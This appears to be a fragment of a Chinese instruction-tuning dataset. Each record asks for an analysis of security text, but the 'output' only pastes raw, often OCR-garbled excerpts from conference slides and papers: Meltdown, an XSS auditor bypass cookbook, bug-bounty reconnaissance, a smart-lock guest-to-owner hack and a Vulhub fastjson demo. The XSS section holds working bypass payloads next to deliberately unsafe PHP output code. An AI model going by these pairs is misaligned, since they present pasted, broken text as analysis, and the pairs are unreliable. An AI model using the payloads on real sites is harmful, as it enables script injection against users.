profile消息使用参数通知smbd来修改profile的配置参数为\\(lqon\\(rq 则获取 profile状态\\(lqoff\\(rq则反之\\(lqcount\\(rq为只获取计数状态(禁止时间状 态)\\(lqflush\\(rq把当前profile的状态清零 debuglevel消息发送\\(lq请求调试等级\\(rq消息再由一个这种类型的消 息返回当前设置的调试等级可以向所有目标发送这种类型的消息 profilelevel消息发送\\(lq请求profile等级\\(rq消息再由一个这种类 型的消息返回当前设置的profile等级可以向所有目标发送这种类型的 消息 printer-notify消息通知smbd进程向连接到打印机的NT客户机轮流 发送打印机通告消息使用这种消息要把打印机名作为参数 .TP \\fB参数\\fR 使用消息类型所需的任何参数 .SH 版本 .PP 此手册页是针对samba2.2所写的 .SH 参见 .PP \\fBnmbd(8)\\fR和\\fBsmbd(8)\\fR .SH 作者 .PP Samba软件和相关工具最初由Andrew Tridgell编写现在它是按开 源软件的形式进行开发的 .PP Samba手册页的原作者是Karl Auer这些文档已被转换成YODL(一种 极好的开放源代码软件可以在ftp://ftp.icce.rug.nl/pub/unix/ 处获得)格式并已由Jeremy Allison更新到samba2.0版本Gerald Carter完成了Samba 2.2的DocBook转化工作 .SH \"[中文版维护人]\" .B meaculpa <meaculpa@21cn.com> .SH \"[中文版最新更新]\" 2001/05/24 .SH \"[中国 Linux 论坛 man 手册页翻译计划]\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMission Impossible Steal Kernel Data from User Space Yueqiang)Cheng,)Zhaofeng)Chen,)Yulong)Zhang,)Yu)Ding,)Tao)Wei) Baidu)Security) About Speakers Dr.$Tao$Wei$ Dr.$Yueqiang$Cheng$ Mr.$Zhaofeng$Chen$ Mr.$Yulong$Zhang$ Dr.$Yu$Ding$ Our)Security)Projects:) How to Read Unauthorized Kernel Data From User Space? $$ Strong Kernel-User Isolation (KUI) Enforced by MMU via Page Table Why is Hard? Assume Kernel has NO implementation bug: No kernel vulnerability to arbitrarily read kernel data Memory Access in KUI Lookup TLB Fetch Page Table Update TLB Protection Check Miss Hit Denied Permitted Protection Fault SIGSEGV Physical Address Virtual Address Permission Checkings 2: Control Registers, e.g., SMAP in CR4 1: Page Table Permissions Image from Intel sdm 1. Unprivileged App + 2. KUI Permission Checking + 3. Bug-free Kernel No Way to Go? However, in order to gain high performance, CPU  1. Unprivileged App + 2. Permission Checking + 3. Bug-free Kernel Microarchitecture$ Speculative)Execution)+)Out-of-order) Execution$ Speculative Execution S$ F$ T$ E$ No$Speculative$Execution$ Misprediction$ Correct$Prediction$ Out-of-order Execution Images$are$from$Dr.$Lihu$Rappoport$ Speculative)Execution)+)) Out-of-order)Execution)) Enough?) Not)Enough)!!!)) Delayed Permission Checking + Cache Side Effects Permission)checking) is)delayed)to)Retire) Unit$ Image$from$https://www.cse.msu.edu/~enbody/postrisc/postrisc2.htm$ Branch)Predictor)in) Front)End)Serving) Speculative)Execution$ Execution)Engine) executes)in)a)out- of-order)way$ Side effects in cache are still there!!! 1. The content of an attacker-chosen memory location, which is inaccessible to the attacker, is loaded into a register. $ Point)to)the)target) kernel)address) How Meltdown (v3) Works How Meltdown (v3) Works 2. A transient instruction accesses a cache line based on the secret content of the register. $ Bring)data)into) cache) This)number) should)>=)0x6) 3. The attacker uses Flush+Reload to determine the accessed cache line ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXSS Bypass Cookbook ver 3.0 XSS Bypass Cookbook [+] Author: math1as [+] Team: L team #1 引言 在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大 因此也引发了不少安全爱好者和专业工程师的研究 而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间 而且不同xss向量也因为浏览器的特性会有所区别 比如chrome在加载资源时会校验服务器返回的mimeType 而firefox则根据标签自己设定的type来做出处理 本文在目前较为常见的几种过滤条件下,简单的探讨了xss这一技术的应用以及绕过 相对于上一版,新增了一个chrome auditor bypass和部分js特性,以及ie下的trick #1.1 研究范围 XSS在各种具体业务场景下的应用和绕过 #1.2 测试环境 在本文所叙述的测试环境中,用到的浏览器版本如下: chrome 54.0 / firefox 50.0 均为当前的最新发行版本 ie系列由于精力有限未能进行测试 正文中所有以x=开头的payload,均是在这个输出环境下测试的,代码如下 <input value=\"<?php error_reporting(0); $content=$_GET['x']; echo $content; ?>\" /> 输出在了input的value属性里 而对于直接输出在上下文或者其他位置的情况,则做了额外的探讨 #2 Bypass Chrome XSS Auditor 反射型XSS作为最容易发现和挖掘的一种XSS,活跃了非常久的时间 但是到现在它的作用已经被逐步的弱化 特别是浏览器,比如chrome自身的xss auditor在其中扮演了非常重要的角色 它通过直接检查了输入的内容,判断其是否在输出中出现 (当然,基本是针对'危险标签'和可能导致javascript执行的地方) 如果符合其过滤条件,那么将直接阻止脚本的执行,比如给出这样的提示 因此给反射XSS带来了不小的难度,但是它就真的那么坚固而不可挑战么? 让我们来从各个方面对它进行逐步的分析吧 本文里所提到的auditor bypass 大部分是输出在属性里的情况,直接输出而被绕过的情况已经很少见了 #2.1 字符集问题产生的bypass 由于chrome浏览器对ISO-2022-JP等编码的处理不当 比如在页面没有设置默认的charset时,使用了这个日语字符集 在会被auditor检查的部分添加%0f字符,就可以绕过了 比如如下payload <meta charset=\"ISO-2022-JP\"><img src=\"#\" onerror%1B28B=alert(1) /> 这其实是利用了浏览器处理字符集时产生的问题 目前的chrome 54/55仍然没有进行修复 随着以后字符集的更新,这种问题仍然有可能出现 #2.2 过滤关键字造成的bypass 在我们的xss测试过程中,可能最不喜欢的就是各类过滤了,它给我们xss带来了很大的难度 但是在特定场合,它却能起到让我们绕过auditor的作用 chrome的xss auditor主要基于如下规则(这种描述也许比较粗糙) (1)输入的内容是否直接在输出中出现 (2)输入是否有敏感标签,或者造成脚本执行的事件 那么聪明的你可能就想到了,如果替换掉了敏感关键字,比如开发者如果替换掉了<script>标签 那么对于这样的一个输出在属性里的例子 while(1) { if(stripos($content,\"<script>\")===false) break; $content=str_replace(\"<script>\",\"\",$content); } <img alt=\"<?php echo $content;?>\"> 如果我们用<script>分割掉敏感的事件,那么我们的输入在经过auditor检查的时候,就被放行了 而真正打印内容进行渲染的时候,由于$content中的<script>被过滤,因此我们的xss脚本成功的执行了 用这种方法,成功的绕过了xss auditor 那么它是否可以被用在直接输出的反射XSS中呢? 我们把这个输出点的代码改成如下: <?php $content=$_GET['x']; while(1) { if(stripos($content,\"<script>\")===false) break; $content=str_replace(\"<script>\",\"\",$content); } echo $content; ?> 事实证明,这种方法是完全可行的 #2.3 协议理解产生的bypass chrome的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--面向企业src的漏洞挖掘 从0到1发现与拓展攻 击面 Speaker name羽 Date2019/04/19 01 子域名枚举端口扫描路径扫描旁站c段查询 常规性资产收集 02 关注页面内容关注目录敏感关键字搜索 巧用搜索引擎 03 构造接口构造文件构造目录框架搭配 发挥创造性思维 04 微信公众号小程序 关注企业动态 05 gayhub搜索漏洞回挖假性社工 其他tips 06 从一个文件服务器静态资源泄露引发的血案 综合案例 content 常规性资产收集 基本的资产收集方式子域名枚举端口扫描路径 扫描旁站c段查询 子域名枚举 4 子域名爆破sublist3rsubdomainsBurtesubfinderlayer子域名挖掘机 子域名枚举 5 在线子域名查询站点云悉资产FOFAVirustotalDnsdumpsterThreatcrowd 路径扫描 6 目录爆破+路径扫描msf中的brute_dirsdir_listingdir_scannerdirsearch 旁站c段查询 7 在线旁站C段查询www.webscan.ccwww.5kik.comphpinfo.me 常规性资产收集 8 子域名爆破工具+ 在线子域名查询 获得子域名列表 子域名枚举 对站点旁站c段进行 查询对获取到的新资 产收录入子域名列表 开启下一轮循环 旁站C段查询 使用nmap探测站点 开放端口记录到域 名列表中 端口扫描 对站点所有开放的 web端口进行路径扫描 获取具体资产 路径扫描 常见困境 9 10 11 巧用搜索引擎 在通过端口扫描目录爆破路径扫描之后仍无法 发现目标站点有效资产的时候借助搜索引擎往往会 有意外的收获 渗透测试必备三大搜索引擎 13 1 百度搜索四星推荐 2 必应搜索四星推荐 3 谷歌搜索五星推荐 14 由于不同的搜索引擎对于同一站点收录的内容会不同使用多个搜索引擎搜索 站点常常能够有意外的收获常用的搜索语法site:www.example.com 关注页面内容 15 intextwww.example.com 关注目录:不同目录下隐藏着不同的系统 16 对于时间就是金钱的众测项目来说 摸清站点结构是十分重要的发现隐 藏的薄弱的系统不仅不容易重复也 更容易获得漏洞赏金 敏感关键字搜索 17 ①parent directory site:www.example.com ②site:www.example.com asmx/xml 发挥创造性思维 假如搜索引擎也失去了色彩这个世界还会好吗还 会的通过发挥创造性思维去构造接口构造文件 构造目录同样可以闯出一片天地当然了加上框 架搭配味道会更佳 发挥创造性思维接口构造 19 seat.xxx.com开局一个登录口 发挥创造性思维接口构造 20 接口泄露 发挥创造性思维接口构造 21 接口请求方式及参数泄露 发挥创造性思维接口构造 22 构造成功 发挥创造性思维文件构造 23 www.xxx.com/about/job/cn/xxx.asp开 局一个几乎静态的页面 发挥创造性思维文件构造 24 然后发现www.xxx.com/about/job/cn/cn.rar 马上整站源码唾手可得 发挥创造性思维目录构造 25 vat.xxx.com开局404 发挥创造性思维目录构造 26 vat.xxx.com/vat/下原来 别有天地 发挥创造性思维框架搭配 27 www.example.com开局直接报错 发挥创造性思维框架搭配 28 探测springboot下的actuator服务 发挥创造性思维框架搭配 29 探测swagger服务 关注企业动态 微信公众号小程序app应用程序 企业动态关注app应用程序新系统新上线功能 31 其他tips gayhub搜索漏洞回挖假性社工 gayhub搜索 33 搜索厂商域名往往也有意外的收获 漏洞回挖关注修复方式新的功能模块 34 发现修复方式就是过滤了漏洞报 告里的那个payload换个payload 照样能执行 假性社工关注内部群员工和客服 35 打入内部群往往能获 取一手资料当然往 往客服内部员工也能 提供很多有关于产品的 的信息 假性社工 36 进行社工时要注意分寸 和尺度有的厂商严格 禁止社工需要注意不 同厂商的要求 综合案例 从一个文件服务器静态资源泄露引发的血案 源起 38 测试的时候碰到这么个文件 服务器域名是ret**.xxx.com 深入 39 发现一个js文件中有很多似乎很有用的东西 整理下收获的信息 发现得到了一个可能过 期的token一个 loginId一个appKey 一个**Key shopCode格式内网 信息测试环境域名及 生产环境域名 再深入 40 另一个js文件中泄露了一个swagger控制台地址 继续整", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnalysis Experience of the suspended EID Card 對被暫停的晶片身分證之分析經驗分享 Speaker : Shi-Cho Cha 主講人查士朝 Dept. of Information Management, NTUST, Chairman and Professor 國立臺灣科技大學資訊管理系 教授兼系主任 Taiwan Information Security Center, Director 國立臺灣科技大學資通安全研究與教學中心主任 Background 背景 2 https://www.ris.gov.tw/apply- idCard/app/idcard/IDCardReissue/main https://www.ris.gov.tw/app/portal/789 Current Status: Suspended 現況 暫停中 https://www.ithome.com.tw/news/142375 Outline 大綱 4 Information Collection 資訊收集 Learning How it Works? 確認運作方式 Identifying Potential Vulnerabilities 識別可能弱點 Key Findings 主要發現 Recommendation 建議 Information Collection 資訊收集 5 Information Collection 資訊收集 Learning How it Works? 確認運作方式 Identifying Potential Vulnerabilities 識別可能弱點 Key Findings 主要發現 Recommendation 建議 6 https://www.ris.gov.tw/app/portal/789 7 8 Hardware Architecture 硬體架構 Crypto. Library 密碼學 函式庫 Card OS 作業系統 Applet 應用程式 EAC+SAC EAL6+ EAL6+ EAL6+ EAL5+ Card OS 卡片作業系統 Library 函式庫 Applet 應用程式 Common Criteria 共通準則認證 ISO/IEC 7816 ISO/IEC 14443 ISO 7816-4 ICAO 9303 Household Registration Address Zone 戶籍地址區 Public Data Zone 公開區 Encrypted Data Zone 加密區 Citizen Digital Certificate Zone 自然人憑證區 9 Household Registration Address Zone 戶籍地區 Household Registration Address (Village and Neighborhood) 戶籍地址 (到村里鄰) Public Data Zone 公開區 Name 姓名 National ID No. 統一編號 Birthday 出生日期 Household Registration Address 戶籍地址 Compulsory Military Service Status役別 Marriage Status 結婚狀態 Card ID No. 證件號碼 Date of Replacement 應換領日期 Date of Issue 製證日期 Photo 相片 (300dpi) No Access Control 無存取控制 Contact 接觸式 Contactless 非接觸式   ICAO SAC (Supplemental Access Control) with MRZ or CAN Contact 接觸式 Contactless 非接觸式   10 Encrypted Data Zone 加密區 Spouse Name 配偶姓名 Father 父姓名 Mother 母姓名 Place of Birth 出生地 Gender 性別 Citizen Digital Certificate Zone 自然人憑證區 姓名 統一編號後 4 碼 憑證序號 憑證有效日期 ICAO EAC (Extended Access Control) + TA +PIN1 Contact 接觸式 Contactless 非接觸式  PIN2 Contact 接觸式 Contactless 非接觸式  ICAO Doc 9303  Machine Readable Travel Documents Eighth Edition, 2021  Part 1: Introduction", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPractice of Android Reverse Engineering Jim Huang ( 黃敬群 ) Developer, 0xlab jserv@0xlab.org July 23, 2011 / HITcon Rights to copy Attribution  ShareAlike 3.0 You are free to copy, distribute, display, and perform the work to make derivative works to make commercial use of the work Under the following conditions Attribution. You must give the original author credit. Share Alike. If you alter, transform, or build upon this work, you may distribute the resulting work only under a license identical to this one. For any reuse or distribution, you must make clear to others the license terms of this work. Any of these conditions can be waived if you get permission from the copyright holder. Your fair use and other rights are in no way affected by the above. License text: http://creativecommons.org/licenses/by-sa/3.0/legalcode  Copyright 2011 0xlab http://0xlab.org/ contact@0xlab.org Corrections, suggestions, contributions and translations are welcome! Latest update:July 23, 2011 Myself was a Kaffe Developer Threaded Interpreter, JIT, AWT for embedded system, robustness was a GCJ (Java Frontend for GCC) and GNU Classpath Developer is an AOSP (Android Open Source Project) contributror 30+ patches are merged officially bionic libc, ARM optimizations Not Only for Cracking (1) Sometimes, it takes __time__ to obtain source code than expected. Taiwanese ODM  (2) Post-optimizations over existing Android applications (3) Borrow\" something good to produce \"goods\" Background Knowledge (and Thank you!)  The Code Injection and Data Protection of Android, Thinker Li @HITcon2011  Reversing Android Malware, Mahmud ab Rahman @HITcon2011  My focus would be the practice.  Hack Android applications for Beginners Agenda (1) Development Flow (2) Reverse Practice (3) Real world tasks 7 Source code Source code Resources Resources Assets Assets Manifest Manifest Key Key Libraries Libraries Create packaged resource compile Dalvik bytecode Create unsigned apk Sign apk Publish or Test Packaged resourc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"CREATE CONSTRAINT TRIGGER\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME CREATE CONSTRAINT TRIGGER \\- 定义一个新的约束触发器 .SH SYNOPSIS .sp .nf CREATE CONSTRAINT TRIGGER \\fIname\\fR AFTER \\fIevents\\fR ON \\fItablename\\fR \\fIconstraint\\fR \\fIattributes\\fR FOR EACH ROW EXECUTE PROCEDURE \\fIfuncname\\fR ( \\fIargs\\fR ) .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBCREATE CONSTRAINT TRIGGER\\fR 被 CREATE TABLE/ALTER TABLE 内部使用以及被 pg_dump 用于创建那些用于参考完整性的特殊的触发器 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 约束触发器的名称 .TP \\fB\\fIevents\\fB\\fR 触发该触发器的事件范围 .TP \\fB\\fItablename\\fB\\fR 发生触发器事件的表名称可能有模式修饰 .TP \\fB\\fIconstraint\\fB\\fR 实际的约束声明 .TP \\fB\\fIattributes\\fB\\fR 约束属性 .TP \\fB\\fIfuncname\\fB(\\fIargs\\fB)\\fR 触发器处理所调用的函数 .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBackdooring the Frontdoor Hacking a \"perfectly secure\" smart lock. About me  Software Engineer by trade  Hacker by passion  Lock picker for fun  The best puzzles are not meant to be solved  Twitter: @jmaxxz August Smart Lock August's marketing team Source: august.com (August 17th, 2015) \"Unlike physical keys which can be duplicated and distributed without your knowledge, an August lock...\" Source: august.com (September 14th, 2015) \"Safer than  codes that can be copied.\" <August's video claiming perfect security> Security claims  Perfectly secure  Guest access can be revoked at any time  Guest permission can be limited to a schedule  Guest can not  Use auto unlock  Invite or remove guests or owners  View activity feed  View Guest List  Change lock settings  Keys can not be duplicated or distributed Mapping out the API WiFi | HTTPS BLE MitM proxy Certificate pinning crap... Solution 1. Use iOS SSL Kill Switch (https://github.com/iSECPartners/ios-ssl-kill-switch) Disabling SSL/TLS system wide at Defcon? Better solution No Jailbreak Certificate Pinned!!! Security claims  Perfectly secure  Guest access can be revoked at any time  Guest permission can be limited to a schedule  Guest can not  Use auto unlock  Invite or remove guests or owners  View activity feed  View Guest List  Change lock settings  Keys can not be duplicated or distributed After mapping out api Postman collection created (see github repo) Not anonymized Creepy Let's fix this MiTM can modify traffic Fix Don't forward log data to August, and tell app logs were received What else can we do? Guest to admin? User Types Guest = user Owner = superuser Replace \"user\" with \"superuser\" Guests can change lock settings! Guests can not use Auto-Unlock Guests can not control lock settings Security claims  Perfectly secure  Guest access can be revoked at any time  Guest permission can be limited to a schedule  Guest can not  Use auto unlock  Invite or remove guests or owners  View activity feed  View Guest List  Chang", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n页眉 忆一次渗透实战 从打点到域控的全过程 杭州安恒信息技术股份有限公司 安服战略支援部-星火实验室-李兵 2019 年 9 月 19 日 目录 1. 信息收集阶段 ................................................................................................................................................ 1 2. 外部打点阶段 ............................................................................................................................................. 10 3. 内网渗透阶段 ............................................................................................................................................. 15 页眉 杭州安恒信息技术股份有限公司 第1页/共 24 页 本次内容跟大家分享一次完整的从打点到域控的实战过程其目的是通过总 结在渗透中的每个阶段来和大家分享一些优秀的渗透工具渗透技巧以及我 个人一些浅薄的渗透经验 本文主要内容分为三个阶段 信息收集阶段 外部打点阶段 内网渗透阶段 1. 信息收集阶段 当我们准备渗透一个目标的时候往往都是从信息收集阶段开始信息收集 可以分为互联网端的信息收集和内网的信息收集互联网端需要收集的最重要的 资产就是域名资产和 IP 资产每个企业都会有自己的域名和 IP这是黑客与测 试人员关注的重点其次是企业相关的账户信息服务信息指纹信息等 让我们从域名DNS的信息收集说起收集 DNS 的方法有很多种可以通 过搜索引擎历史数据网站爬虫SSL 证书DNS 区域传送暴力破解等方式 如果单独去执行每一种方法可能需要做不少的工作下面我介绍一款优秀的开 源工具它可以完成以上 80%以上的工作 页眉 杭州安恒信息技术股份有限公司 第2页/共 24 页 Sublist3r 是一款基于 Python 实现的域名收集工具它基本支持上面提到的大 部分方法从搜索引擎VirustotalDNSdumpsterSSLCert 等站点查找子域名 在进行域名爆破时程序会使用到一个互联网 DNS 服务器列表然后以轮训的 方式来进行枚举任务这种方式可以避免因为大量 DNS 请求所导致的访问受限 Python sublist3r.py -d target.com -b -t 50 -o target.dns.txt 当程序将扫描结果写入 target.dns.txt 文件之后我们就有了这个目标的域名 资产那么我们如何再获取目标的 IP 资产呢 我的方法是使用 BASH 脚本将文件中的域名解析为 IP然后再做去重和 C 段识别处理随手找了个目标域名用于演示 页眉 杭州安恒信息技术股份有限公司 第3页/共 24 页 for i in `cat target.dns.txt`;do host $i|grep -E -o \"([0-9]{1,3}[\\.]){3}[0- 9]{1,3}\";done |sort|uniq|grep -E -o \"([0-9]{1,3}[\\.]){3}\"|uniq -c|awk '{if ($1>=3) print $2\"0/24\"}' 这样就获取到了目标的域名资产和 IP 资产 这里关于 IP 信息收集有一个小技巧就是渗透一些大型目标时在目标公 司有 AS自治系统的情况下可以通过 https://bgp.he.net/ 这个运营商来查询 目标公司的自治系统号和 CIDR 路由自治系统分配情况也可以在 IANA 查询 到 页眉 杭州安恒信息技术股份有限公司 第4页/共 24 页 https://www.iana.org/assignments/as-numbers/as-numbers.xhtml 有了 DNSIP 段C 段列表这些目标的基础轮廓以后就可以对目标进行端 口和服务探测以及 Web 资产识别了端口服务探测我使用的是 Nmap如果目 标网络范围超过一个 C 段我通常会用 MasscanMasscan 也可以将扫描结果存 储为 Nmap 格式拿到 XML 扫描结果以后再用 Webmap 来解析 XML 扫描结 果Webmap 还有一个好处就是可以团队协作它的扫描结果展示如下 页眉 杭州安恒信息技术股份有限公司 第5页/共 24 页 可以为每个目标打上 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# JAVA安全 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **CTF writup** - [BUU-Java逆向解密](https://blog.csdn.net/qq_42602454/article/details/108825608) --- ## 代码混淆 - https://allatori.com/ - [lqs1848/AllatoriCrack](https://github.com/lqs1848/AllatoriCrack) - 破解 Java 混淆工具 Allatori --- ## 反编译 **在线反编译工具** - [Java decompiler online](http://www.javadecompilers.com/) **反编译工具** - [skylot/jadx](https://github.com/skylot/jadx) - Dex to Java decompiler - [java-decompiler/jd-gui](https://github.com/java-decompiler/jd-gui) - A standalone Java Decompiler GUI - [deathmarine/Luyten](https://github.com/deathmarine/Luyten) - An Open Source Java Decompiler Gui for Procyon --- ## JAVA代码审计 - [JAVA代码审计](./JAVA安全/JAVA代码审计.md)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMicrokernel development: from project to implementation Technical Notes Rodrigo Maximiano Antunes de Almeida rmaalmeida@gmail.com Universidade Federal de Itajubá Summary This is the technical notes about the ESC talk: Microkernel development: from project to implementation given by Rodrigo Maximiano Antunes de Almeida, from Unifei. The talk consists of the design and implementation of a microkernel. The project will be developed on ISO-C without the standard libraries, in such a way that the code to be presented to the participants can be easily ported to any architecture and used as a basis for future projects. It will also be addressed the standardization of the procedures and hardware requisitions, encapsulated as drivers. Upon completion, the participants will have a better understanding about the kernel its advantages and restrictions. This documents presents in deeper details some of the topics that will be covered in the speech, mainly the theoretical ones. License This document is licensed under Creative Commons  Attribution  Non Commercial  Share Alike license. You're free to: to Share  to copy, distribute and transmit the work to Remix  to adapt the work Under the following conditions: Attribution  You must attribute the work (but not in any way that suggests that they endorse you or your use of the work). Noncommercial  You may not use this work for commercial purposes. Share Alike  If you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one. Index 1 Developing an embedded system .................................................................................................................... 1 1.1 System connections ........................................................................................................................................ 1 2 System programming .......................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\\ I am a legend Celine & Elie Bursztein https://www.elie.net/hs Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Digital Collectible Card Game Released by Blizzard in 2014 Based of World of Warcraft universe Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Sometimes too interesting leads to un-intended consequences Painting by http://www.jason-w.com/blog/the-fall-of-lordaeron Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Game complexity generates exploitable biases Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Outline Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Outline 1. Finding undervalued cards Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Outline 1. Finding undervalued cards 2. Predicting opponent deck Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Outline 1. Finding undervalued cards 2. Predicting opponent deck 3. Predicting the game outcome Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Outline 1. Finding undervalued cards 2. Predicting opponent deck 3. Predicting the game outcome 4. Incoming alien invasion (or not) Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs You hero Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs You hero Opponent hero Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Hero health Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Deck Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs hand Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs hand Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs mana pool Celine & Elie Bursztein I am a legend - Defcon 2014", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# w3af ## w3af软件包描述 w3af是一个用于对Web应用程序进行攻击和代码审计的框架旨在识别和利用几乎所有Web应用程序漏洞w3af软件包为本框架提供了图形用户界面GUI如果您只想通过命令行使用w3af的话可以安装w3af-consolew3af框架被称为网络渗透界的metasploit但实际上w3af的功能不仅如此它还能够使用黑盒扫描技术发现web应用程序漏洞w3af本身及其插件都是使用Python编写的w3af拥有130多个插件使用它们可以方便地识别和利用SQL注入跨站脚本XSS远程文件包含等漏洞. [w3af首页](http://w3af.sourceforge.net/) | [Kali w3af Repo](http://git.kali.org/gitweb/?p=packages/w3af.git;a=summary) - 作者Andres Riancho - 许可证GPLv2 ### w3af软件包中包含的工具 ##### w3af - Web应用程序攻击和审计框架 Web应用程序攻击和审计框架 ### w3af使用方法(GUI) ```root @ kaliw3af``` ![w3af的gui界面图](http://tools.kali.org/wp-content/uploads/2014/02/w3af.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMTVEC CORRUPTION FOR HARDENING ISA Adam 'pi3' Zabrocki Twitter: @Adam_pi3 GLITCHING RISC-V CHIPS: Alex Matrosov Twitter: @matrosov /USR/BIN/WHOWEARE Adam pi3 Zabrocki: 2  Phrack author  Bughunter (Hyper-V, Intel/NVIDIA vGPU, Linux kernel, OpenSSH, Apache, gcc SSP / ProPolice, Apache, xpdf, more)  CVEs  The ERESI Reverse Engineering Software Interface  Creator and a developer of Linux Kernel Runtime Guard (LKRG)  More Private contact: http://pi3.com.pl pi3@pi3.com.pl Twitter: @Adam_pi3 Alex Matrosov: Private contact: github.com/binarly-io Twitter: @matrosov  Security REsearcher since 1997  Conference speaker and trainer  Breaking all shades of firmware  codeXplorer & efiXplorer IDA plugins  Author \"Bootkits and Rootkits\" book  Founder of Binarly, Inc.  More... WHAT IS THIS TALK ABOUT? 3 Hardware: Software: WHAT IS THIS TALK ABOUT? 4 Hardware: Software: WHAT IS THIS TALK ABOUT? 5 Hardware: Software: WHAT IS THIS TALK ABOUT? 6 Hardware: Software: Hacker Pure HW attacks, e.g.:  Glitching  Side channel  Physical probing  More... Pure SW attacks, e.g.:  Memory safety (like overflows)  Injections (like cmd, XSS, SQL, etc.)  Logical issues (like bad design)  More... WHAT IS THIS TALK ABOUT? 7 Hardware: Software: Hacker Pure HW attacks, e.g.:  Glitching  Side channel  Physical probing  More... Pure SW attacks, e.g.,:  Memory safety (like overflows)  Injections (like cmd, XSS, SQL, etc.)  Logical issues (like bad design)  More... Targeting specific implementation (e.g., programming language, compiler, firmware, etc.) WHAT IS THIS TALK ABOUT? 8 Hardware: Software: Hacker Pure HW attacks, e.g.,:  Glitching  Side channel  Physical probing  More... Pure SW attacks, e.g.,:  Memory safety (like overflows)  Injections (like cmd, XSS, SQL, etc.)  Logical issues (like bad design)  More... Targeting specific implementation (e.g., programming language, compiler, firmware, etc.) Targeting specific implementation (e.g., CPU family, implementation of architecture, etc.) WHAT IS THIS TALK A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.vulhub.fastjsondemo; import com.alibaba.fastjson.serializer.SerializerFeature; import com.alibaba.fastjson.support.config.FastJsonConfig; import com.alibaba.fastjson.support.spring.FastJsonHttpMessageConverter; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.boot.autoconfigure.http.HttpMessageConverters; import org.springframework.context.annotation.Bean; import org.springframework.http.converter.HttpMessageConverter; @SpringBootApplication public class FastjsondemoApplication { public static void main(String[] args) { SpringApplication.run(FastjsondemoApplication.class, args); } @Bean public HttpMessageConverters fastJsonHttpMessageConverters() { FastJsonHttpMessageConverter fastConverter = new FastJsonHttpMessageConverter(); FastJsonConfig fastJsonConfig = new FastJsonConfig(); fastJsonConfig.setSerializerFeatures(SerializerFeature.PrettyFormat); fastConverter.setFastJsonConfig(fastJsonConfig); HttpMessageConverter<?> converter = fastConverter; return new HttpMessageConverters(converter); } }", "category": "text_analysis", "source": "security_papers"}
